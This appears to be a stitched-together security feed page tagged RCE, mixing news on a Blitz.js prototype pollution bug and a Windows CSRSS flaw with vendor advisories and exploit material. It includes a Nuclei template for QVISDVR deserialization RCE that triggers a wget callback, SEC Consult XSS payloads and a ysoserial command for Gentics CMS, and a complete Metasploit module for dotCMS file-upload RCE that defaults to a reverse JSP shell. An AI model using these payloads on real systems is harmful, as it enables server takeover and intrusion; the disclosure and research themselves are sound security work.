Chain of exploits could be triggered without any authentication

Chain of exploits could be triggered without any authentication

Blitz.js, a JavaScript web application framework, has patched a dangerous prototype pollution vulnerability that could lead to remote code execution (RCE) on Node.js servers.

Prototype pollution is a type of JavaScript vulnerability that allows attackers to exploit the rules of the programming language to change an application’s behavior and compromise it in various ways.

The new bug, discovered and reported by researchers at Sonar, allowed attackers to manipulate the code in the Blitz.js app to create a reverse shell and run arbitrary commands on the server.

**Prototype vulnerability in dependencies**

“Blitz.js is an upcoming JS framework that gained traction on GitHub,” Paul Gerste, vulnerability researcher at Sonar, told _The Daily Swig_. “We selected it in order to help secure its code base and study real-world vulnerabilities.”

Blitz is built on top of Next.js, a React-based framework, and adds components to turn it into a full-stack web development platform.

**DEEP DIVES** Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications

One of the advertised features of Blitz.js is its ‘Zero-API’ layer, which allows the client to invoke server-side business logic through simple functions without the need to write API code.

Blitz.js makes an RPC call to the server in the background and returns the response to the client function call.

“Blitz.js adds an RPC layer on top of Next.js (among other features), and that layer uses superjson to deserialize data from incoming requests. The vulnerability is entirely inside of superjson,” Gerste said.

As an extended version of JSON, superjson adds support for dates, regexes, and circular dependencies. The circular dependency feature allows JSON specifications to reference property names, which caused the prototype vulnerability. An attacker could use these property names to change the running code on the server.

**RCE on Blitz servers**

Gerste discovered a chain of exploits that could be triggered through the prototype pollution vulnerability and lead to RCE.

First, a polluted JSON request is sent to the server, which triggers the routing mechanism of Blitz.js to load a JavaScript file with the polluted prototype. This allows the attacker to use the malicious JavaScript object to execute arbitrary code.

Read more of the latest infosec research news

Ideally, an attacker would create and run a file on the server. But Blitz.js does not support upload functionality. However, it has a CLI wrapper script that uses JavaScript’s function to launch a new process.

The attacker could use this function to launch a CLI process and run an arbitrary command on the server.

  
  
Prototype pollution in Blitz.js (Image: sonarsource.com)

What makes this vulnerability especially dangerous is that it can be triggered without any authentication, which means any user who can access the Blitz.js application will be able to launch RCE attacks.

“An attacker would have the same level of privilege as the vulnerable application,” Gerste said. “So, if the application runs as root, the attacker would also have root privileges.”

**Complicated bug**

Prototype pollution bugs often act in very complicated ways. For example, in the case of Blitz.js, the CLI wrapper object was not vulnerable per se but could be abused by the prototype pollution bug.

“This attack technique leverages a code pattern that isn’t a vulnerability in itself,” Gerste said. “Prototype pollution can influence the target application in a very invasive way, and it would require a lot of work to get rid of all code that could be influenced by prototype pollution.”

In his write-up of the bug, Gerste gives some general recommendations that can harden JavaScript apps against prototype pollution, including freezing or using the flag in Node.js.

“I think prototype pollution is still unknown to many JavaScript developers,” Gerste said. “I don’t see developers use the patterns that we recommended in our article very often. With our blog posts, we try to help educate JavaScript developers and share this knowledge.”

**YOU MIGHT ALSO LIKE** Microsoft Teams security vulnerability left users open to XSS via flawed stickers feature

Prototype pollution in Blitz.js leads to remote code execution

Feds urge U.S. agencies to patch a Microsoft July Patch Tuesday 2022 bug that is being exploited in the wild by August 2.

Feds urge U.S. agencies to patch a Microsoft July Patch Tuesday 2022 bug that is being exploited in the wild by August 2.

A Windows 11 vulnerability, part of Microsoft’s Patch Tuesday roundup of fixes, is being exploited in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to advise patching of the elevation of privileges flaw by August 2.

The recommendation is directed at federal agencies and concerns CVE-2022-22047, a vulnerability that carries a CVSS score of high (7.8) and exposes Windows Client Server Runtime Subsystem (CSRSS) used in Windows 11 (and earlier versions dating back to 7) and also Windows Server 2022 (and earlier versions 2008, 2012, 2016 and 2019) to attack.

_\[**FREE On-demand Event**: **Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **WATCH HERE**.\]_

The CSRSS bug is an elevation of privileges vulnerability that allows adversaries with a pre-established foothold on a targeted system to execute code as an unprivileged user. When the bug was first reported by Microsoft’s own security team earlier this month it was classified as a zero-day, or a known bug with no patch. That patch was made available on Tuesday July 5.

Researchers at FortiGuard Labs, a division of Fortinet, said the threat the bug poses to business is “medium”. In a bulletin, researchers explain the downgraded rating because an adversary needs advanced “local” or physical access to the targeted system to exploit the bug and a patch is available.

That said, an attacker who has previously gained remote access to a computer system (via malware infection) could exploit the vulnerability remotely.

“Although there is no further information on exploitation released by Microsoft, it can be surmised that an unknown remote code execution allowed for an attacker to perform lateral movement and escalate privileges on machines vulnerable to CVE-2022-22047, ultimately allowing for SYSTEM privileges,” FortiGuard Labs wrote.

**Office and Adobe Documents Entry Points**

While the vulnerability is being actively exploited, there are no known public proof of concept exploits in the wild that can be used to help mitigate or sometimes fuel attacks, according to a report by The Record.

“The vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,” wrote Trend Micro’s Zero Day Initiative (ZDI) in its Patch Tuesday roundup last week.

“Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft’s delay in blocking all Office macros by default,” wrote ZDI author Dustin Childs.

Microsoft recently said it would block the use of Visual Basic for Applications (VBA) macros by default in some of its Office apps, however set no timeline enforce the policy.

CISA added the Microsoft bug to its running list of known exploited vulnerabilities on July 7 (search “CVE-2022-22047” to find the entry) and recommends simply, “apply updates per vendor instructions”.

_\[**FREE On-demand Event**: **Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **WATCH HERE**.\]_

Image: Courtesy of Microsoft

CISA Urges Patch of Exploited Windows 11 Bug by Aug. 2

QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.

id: qvisdvr-deserialization-rce

info:

name: QVISDVR JSF Deserialization - Remote Code Execution

author: me9187

severity: critical

description: |

QVISDVR Java-Deserialization was discovered, which could allow remote code execution.

reference:

\- https://twitter.com/Me9187/status/1414606876575162373

classification:

cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

cvss-score: 10.0

cwe-id: CWE-77

tags: qvisdvr,rce,deserialization,jsf,iot

requests:

\- raw:

\- |

GET /qvisdvr/ HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

\- |

POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

javax.faces.ViewState={{generate\_java\_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

extractors:

\- type: regex

name: token

group: 1

internal: true

part: header

regex:

\- "JSESSIONID=(.\*)"

matchers-condition: and

matchers:

\- type: word

part: interactsh\_protocol

words:

\- http

\- type: status

status:

\- 500

# Enhanced by mp on 2022/05/19

CVE-2021-41419: nuclei-templates/qvisdvr-deserialization-rce.yaml at master · projectdiscovery/nuclei-templates

An issue was discovered in Poly EagleEye Director II before 2.2.2.1. os.system command injection can be achieved by an admin.

DATE

ID#

TITLE

03-07-22

PLYTV21-09

Studio X50 – Improper Neutralization of Special Elements used in an OS Command

03-07-22

PLYPL21-12

EEDII – Multiple Security Vulnerabilities

02-23-22

PLYGN21-08

Poly Systems – Apache Log4j

09-29-21

Security Advisory Version 1.0

Plantronics Hub – Local Privilege Escalation

09-07-21

Security Bulletin Version 1.0

CX5100/CX5500 Authenticated Command Injection

04-30-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly VOIP Phones

02-24-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly VOIP Phones

02-24-21

Security Bulletin Version 1.1

Increased SIP Provisioning Attacks

02-22-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly ZTP Service

01-20-21

Security Bulletin Version 1.0

Cybersecurity and Infrastructure Security Agency (CISA) Alert AA20-352A

04-24-20

Security Bulletin Version 1.0

Poly Recommended Best Security Practices for Unified Communications

04-01-20

Security Advisory Version 1.0

Poly Voice Endpoints – XSS and CSRF Vulnerabilities

02-07-20

Security Bulletin Version 1.0

CCX500 - UI Vulnerability Allows Access to Android Settings

01-15-20

Security Bulletin Version 1.6

Worldwide H.323 and SIP Botnet Calling Video Systems

01-10-20

Security Advisory Version 1.2.0

Remote Code Execution Vulnerability in UCS Software

01-10-20

Security Advisory Version 1.0.0

Vulnerabilities in VxWorks Operating System and Poly Products

09-04-19

Security Advisory Version 1.0.0

Plantronics Hub - Local Privilege Escalation Vulnerability

08-06-19

Security Advisory Version 1.0

Remote Code Execution Vulnerability in Obihai OBi1022

06-19-19

Security Advisory Version 1.1

Insufficient Authentication Resulting in Information Leakage on VVX Products

06-14-19

Security Advisory Version 1.1

Hard Coded Credentials Vulnerability in VVX Products

04-26-19

Security Advisory Version 1.0

Multiple Vulnerabilities in HDX Products Older than 3.1.14

02-20-19

Security Bulletin Version 1.0

HDX (versions older than 3.1.13) can be affected by multiple Botnets

01-24-19

Security Advisory Version 1.1

Cyber Threats Targeting Default Passwords

11-30-18

Security Bulletin Version 1.1

TLS 1.2 and Microsoft O365 Impacts to Polycom Products

11-05-18

Security Bulletin Version 1.0

Bluetooth Authentication Weakness Found in Trio

11-05-18

Security Bulletin Version 1.0

Stored Cross-Site Scripting Found in Trio

11-01-18

Security Bulletin Version 1.0

Remote Code Execution Vulnerability Found in Group Series

08-10-18

Security Bulletin Version 1.1

HDX SoftwareVersions Older than 3.1.12 and Omni Botnet

07-12-18

Security Advisory Version 1.9

Processor Based "Speculative Execution" Vulnerabilities AKA "Spectre" and "Meltdown" on Polycom Products

07-11-18

Security Advisory Version 1.2

Vulnerabilities in Polycom VVX Phones and UC Software

07-03-18

Security Advisory Version 1.0

Polycom UCS Software Vulnerabilities

06-26-18

Security Advisory Version 1.1

RealPresence Web Suite Vulnerability

05-10-18

Security Advisory Version 1.0

RealPresence Debut Vulnerabilities

03-05-18

Security Advisory Version 1.0

QDX 6000 Vulnerabilities

12-20-17

Security Advisory Version 1.2

"Krack" Vulnerability with Polycom Products

11-24-17

Security Advisory Version 1.2

Remote Code Execution on HDX Endpoints

10-18-17

Security Advisory Version 1.1

BlueBorne Bluetooth Vulnerabilities

08-28-17

Security Advisory Version 1.0

Information Disclosure on Multiple Polycom Products

08-11-17

Security Bulletin Version 1.1

WannaCry Vulnerability and Polycom Products

06-14-17

Security Bulletin Version 1.0

Relating to CVE-2017-7494 "SambaCry" Vulnerability and Polycom Products

03-22-17

Security Bulletin Version 1.0

Relating to CVE-2017-5638 "Apache Struts" Vulnerability and Polycom Products

10-26-16

Security Advisory Version 1.1

Relating to CVE-2016-5195 "Dirty COW" Vulnerability

09-20-16

Security Advisory Version 2.0

Relating to a Cross-site Scripting (XSS) Vulnerability in Polycom HDX Video Endpoints

09-13-16

Security Advisory Version 1.0

Relating to an XML External Entity (XXE) Vulnerability in Polycom HDX Video Endpoints)

04-06-16

Security Advisory Version 1.2

Relating to a GNU glibc DNS Vulnerability (CVE-2015-7547)

03-08-16

Security Bulletin Version 1.0

Relating to CVE-2016-0800 “DROWN” Vulnerability and Polycom Products

02-09-16

Security Office Update 2.0

Security Update Relating to H.323 and SIP AES Media Encryption on Polycom Products

12-16-15

Security Advisory Version 1.0

Relating to RealPresence Capture Server and RealPresence Media Suite Appliance Editions

12-09-15

Security Advisory Version 1.0

Relating to Path Traversal Vulnerabilities in Polycom VVX Business Media Phones

10-23-15

Security Advisory Version 2.0

Relating to GHOST glibc Vulnerability

10-23-15

Security Advisory Version 1.6.1

Relating to Logjam Vulnerability

06-29-15

Security Bulletin Version 1.0

RealPresence Resource Manager 8.4 security fixes summary

06-23-15

Security Advisory Version 1.0

Relating to Command Shell Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Inadequate SSH Restrictions Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Software Update Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Weak Entropy Vulnerability in Polycom Group Series Video Endpoints Web Cookies

06-17-15

Security Bulletin Version 1.0

Relating to "Tomcat Denial of Service"

06-15-15

Security Bulletin Version 1.0

Relating to Leap Second Insertion

04-20-15

Security Bulletin Version 1.6

Relating to SSLv3 "POODLE" Vulnerability and Polycom Products

10-24-14

Security Advisory Version 1.7

Relating to Bash shell arbitrary code execution on Various Polycom Products

10-06-14

Security Bulletin Version 1.2

Relating to Multiple OpenSSL Vulnerabilities on Various Polycom Products

06-05-14

Security Advisory Version 1.12

Relating to OpenSSL Vulnerability “Heartbleed” on Various Polycom Products

12-20-13

Security Bulletin 5471

Relating to JBoss Application Server on RealPresence Resource Manager

03-14-13

Security Bulletin 102404

Security Advisory relating to telnet shell authorization bypass on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107522

Security Advisory Relating to the Firmware Update Command Injection Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107523

Security Advisory Relating to the Command Shell Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107524

Security Advisory Relating to the H.323 Format String Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107525

Security Advisory Relating to the H.323 CDR Database SQL Injection on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107526

Security Advisory Relating to the PUP File Header MAC Signature Bypass on Polycom HDX Video Endpoints

CVE-2022-26482: Security Center

An issue was discovered in Infiray IRAY-A8Z3 1.0.957. There is a blank root password for TELNET by default.

The IRAY A8Z3 thermal camera for industrial application, manufactured by Infiray/IRay Technologies is affected by multiple vulnerabilities. These are a direct consequence of insecure coding practices, insecure configuration and outdated software components within the embedded firmware. Multiple attack vectors were found that will result in remote code execution (RCE). The vendor did not reply anymore to our communication attempts, hence it is unclear whether patches are available.

**Vendor description**

_"IRay Technology Co., Ltd. is a wholly-owned subsidiary of Raytron Technology Co., Ltd. (SSE: 688002). As a high-tech enterprise, IRay Technology develops and manufactures infrared FPA detectors, thermal imaging modules, and other products, with completely independent intellectual property rights. We are committed to providing global customers with professional thermal imaging products and solutions. The main products include IRFPA detectors, thermal imaging cores, and terminal products for application."_ 

Source: http://www.infiray.com/about.html

**Business recommendation**

The vendor was unresponsive during the disclosure process. Hence it is unclear whether patches are available. Customers are urged to approach their vendor contact and request security reviews and updates. 

SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. 

**Vulnerability overview/description****1) Hardcoded Web Credentials (CVE-2022-31210) **

The binary file "/usr/local/sbin/webproject/set\_param.cgi" contains hardcoded credentials to the web application. As these accounts cannot be deactivated or change their passwords, they are considered to be backdoor accounts. 

**2) Authenticated Remote Code Execution (CVE-2022-31208) **

The webserver contains an endpoint that can execute arbitrary commands by manipulating the "cmd\_string" URL parameter. The user can login using one of the backdoor accounts from issue 1. 

**3) Potential Buffer Overflow (CVE-2022-31209) **

The firmware contains a potential buffer overflow by calling strcpy() without checking the string length beforehand. 

**4) Telnet Root Shell without Password (CVE-2022-31211) **

The camera offers a shell through a telnet connection. The root user does not require a password per default. Thus, anyone on the local network can execute arbitrary commands as root on the camera. 

**5) Multiple Outdated Software Components **

Multiple outdated software components containing vulnerabilities were found by the IoT Inspector (ONEKEY) firmware analysis platform.  

**Proof of concept****1) Hardcoded Web Credentials (CVE-2022-31210) **

The following cgi program will be executed during the login process: 

    http ://<my_ip>:8080/set_param.cgi?&group_tag=hash_param_bridge&set_cmd=loading&length=35&name=<user>&password=<password>&access=0&0.3543773172371312 

The following de-compilation shows the code flow with the hardcoded passwords: 

    [ PoC removed ] 

The authentication works by comparing the URL supplied username with the string **"\[removed\]".** Afterwards it will compare the password parameter to **"\[removed\]"** as well. If both string parameters match, a message will be removed from the messaging queue. Otherwise the function will just return. The same comparison holds for the admin account. 

Furthermore, string comparisons are made without checking the case. Hence, drastically improving the chances of brute-force attacks. 

**2) Authenticated Remote Code Execution (CVE-2022-31208) **

The web application offers an option to view the device log. Opening following URL while logged in as admin (e.g. with hardcoded password from section 1) will trigger the request: 

    http ://<my_ip>:8080/cmd.cgi?cmd_tag=cmd_passthrough&cmd_string=[removed]

By changing the "cmd\_string" parameter, arbitrary commands can be executed with the rights of the webserver (www-data). The de-compiled code can be seen in following snippet: 

    [ PoC removed ] 

The "cmd\_string" parameter is directly passed into popen() and hence executed. 

**3) Potential Buffer-Overflow (CVE-2022-31209) **

The firmware contains a potential buffer overflow vulnerability: 

    [ PoC removed ] 

A pointer to the "next\_url" parameter is supplied. A buffer of 64 bytes is allocated and the parameter value copied to it without checking the string length. Hence, a "next\_url" parameter with more than 64 bytes could be supplied in order to overflow the buffer. Please note that this vulnerability is only based on firmware analysis and thus was not tested in a live scenario. 

**4) Telnet Root Shell without Password (CVE-2022-31211) **

The camera has a telnetd server running on port 23 per default. The root password is empty. If the telnet port is exposed to the internet, an attacker could easily connect to the device and gain root access. The telnet server cannot be deactivated and the root password cannot be changed through the web interface. 

**5) Multiple Outdated Software Components **

IoT Inspector (ONEKEY) recognized multiple outdated software components with known vulnerabilities:

    BusyBox 1.25.0:                                  6 CVEs 
    curl 7.54.0:                                    13 CVEs 
    Dnsmasq 2.76:                                    9 CVEs 
    lighttpd 1.4.41:                                 2 CVEs 
    Linux Kernel 3.10.104:                        1004 CVEs 
    hostapd 2.5:                                    22 CVEs 
    wpa_supplicant 2.5-devel_rtw_r17190.20160415:   12 CVEs 

**Vulnerable / tested versions**

The following product/firmware version has been tested: 

*   Infiray IRAY-A8Z3 V1.0.957 

It has to be assumed that further products or firmware versions are affected as well. 

**Vendor contact timeline**

CVE-2022-31211: Multiple Vulnerabilities in Infiray IRAY-A8Z3 thermal camera

An issue was discovered in Gentics CMS before 5.43.1. There is stored XSS in the profile description and in the username.

Gentics CMS is a solution to design and manage a website. The CMS is vulnerable to two vulnerabilities that lead to stored Cross-Site-Scripting (XSS) as well as Remote Code Execution (RCE) via unsafe deserialization of Java objects.

**Vendor description**

_"APA-IT Informations Technologie GmbH offers offers support with a focus on media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press Agency, we are responsible for the IT of the Austrian news agency as well as numerous other media enterprises._

_This expertise and insight into the industry make APA-IT an expert for IT solutions for publishers and media-related companies. Existing systems and tools are constantly developed and tailored to individual customer needs. As such, APA-IT is always available – from conception to operation."_ 

Source: https://www.gentics.com/genticscms/company\_gentics.en.html

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. 

**Vulnerability overview/description****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

Multiple cross-site scripting vulnerabilities are present in the application. An attacker can store malicious JavaScript code in the username and profile description. The code will execute once an admin user hovers over the attacker's username. Thus, the attacker can execute code in the context of an admin. 

**2) Unsafe Java Deserialization (CVE-2022-30981) **

The Gentics CMS has an import option which will accept ZIP files. The archive includes a Java serialized object that gets deserialized on import. This can lead to code execution on the server. 

A low privileged user might be able to exploit this vulnerability by chaining it together with vulnerability 1). 

**Proof of concept****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

To trigger the first XSS, an attacker has to change the profile description to include a payload, e.g. **"<script>alert(document.domain)</script)".** The payload will execute once a user with access to the userlist hovers his mouse over the profile name. The event "onmouseover" will trigger following code: 

    JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br> 
    <script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
    ( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' ); 

The execution of the code leads to following function: 

    function JSI3_comp_list_401__ass( obj, title, text, assTitle ) 
    { 
    JSI3_comp_list_401__assReset(); 
    clearTimeout( JSI3_comp_list_401___ass_timeout ); 
    JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ); 
    } 

The malicious code, which is contained in the "text" parameter, gets passed through to the next function. There it is added to an HTML element and thus executed in the browser. 

    function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) { 
             if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) { 
                 JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true; 
                 $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:'')); 
                 $(obj).tipsy({ 
                         trigger: 'manual', 
                         html: true, 
                         offset: 3, 
                         delayIn: 900, 
                         delayOut: 0, 
                         opacity: 0.85, 
                         gravity: 'nww' 
                  }); 
              } 
              $(obj).tipsy("show"); 
              gcn_active_tipsy = obj; 
    } 

Another XSS vector can be found in the parameters "First Name" and "Last Name". 

By e.g. changing the last name to 'Node" onload="alert(document.domain)',  JavaScript code is added to the profile picture that is loaded in the upper right corner on every page. The following snippet shows the vulnerable line of code: 

    <div id="profil"> 
    <div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div> 

The third XSS is caused by changing the first and last name into JavaScript code without prior encoding. Changing the last name to "Last Name'+eval(alert(document.domain))+'" will cause the following code to be included in the server's response: 

    <script language="JavaScript" type="text/javascript"> 
    var menus = new Array(); 
    var imgs = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1; 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

**2) Unsafe Java Deserialization (CVE-2022-30981) **

First, a malicious ZIP archive needs to be created. The following files will need to be included within this archive: 

    bundlebuild.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <bundlebuild>
            <bundleinfo>
                  <name><![CDATA[test4]]></name>
                  <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>
                  <description><![CDATA[]]></description>
                  <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>
                  <globalprefix>D77D</globalprefix>
             </bundleinfo>
             <builds>
                     <build>
                           <builddate>1618996405</builddate>
                           <changelog><![CDATA[test4]]></changelog>
                           <count>0</count>
                     </build>
              </builds>
              <tables>
              </tables>
    </bundlebuild>
    
    containedobjects.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <objects>
    </objects>

The third file has to be named "serializedjava.bin" and contains the actual payload. A demo payload can be generated with following command: 

    $ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin 

Those three files have to be zipped together into an archive, which can be uploaded. 

The import feature is available under Enterprise CMS -> Administration -> Import and Export. Now select New->Import and upload the malicious ZIP archive. 

Wait until the import completed. Now click on "Test succeeded" in the file list. On the new screen select "Start import in background". The payload should create a file called "upload\_<random\_uuid>.tmp" in the folder /tmp. It will contain the string "SECTEST".  

Better deserialization chains could be built to reach more interesting targets. It is very likely, that RCE could be obtained by writing an own deserialization chain. 

**Vulnerable / tested versions**

The following product version has been tested and found to be vulnerable. Other versions are vulnerable as well, please see the vendor's changelog in the solution section. 

*   Gentics CMS 5.36.29

**Vendor contact timeline**

CVE-2022-30982: Multiple vulnerabilies in Gentics CMS

Pexip Infinity before 28.1 allows remote attackers to trigger a software abort via G.719.

CVE-2022-32263: Pexip security bulletins | Pexip Infinity Docs

Pexip Infinity 27 before 28.0 allows remote attackers to trigger excessive resource consumption and termination because of registrar resource mishandling.

CVE-2022-29286: Pexip security bulletins | Pexip Infinity Docs

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

CVE-2022-26352: dotCMS Shell Upload ≈ Packet Storm

Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via single-sign-on if a random Universally Unique Identifier is guessed.

Tag

#rce